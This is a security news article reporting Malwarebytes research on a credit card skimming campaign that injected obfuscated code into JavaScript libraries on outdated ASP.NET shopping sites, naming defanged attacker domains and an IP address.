Credit card skimmer preyed on old ASP.NET-powered websites with shopping carts

A credit card-skimming scheme tracked since April and targeting at least a dozen websites – all hosted on Microsoft IIS servers running the ASP.NET web application framework – counts among its victims sports organizations, health and community associations, and a credit union.

What they have also in common is that a malicious code was injected into existing JavaScript libraries on each of the sites, according to new research from Malwarebytes, which discovered the campaign in the spring. 

The hackers apparently exploited an old version of ASP.NET (4.0.30319) that Microsoft no longer supports and is known to have vulnerabilities.

While not as popular as .php, ASP.NET retains a sizable market share that includes smaller business websites and personal blogs that include an e-commerce component. Malwarebytes believes the skimming campaign likely began sometime in April 2020 as the first domain (hivnd[.]net) part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.

In a few instances, the skimmer was loaded remotely, explains Malwarebytes, providing a screenshot of a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.

The skimmer not only looks for credit card numbers but also passwords.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.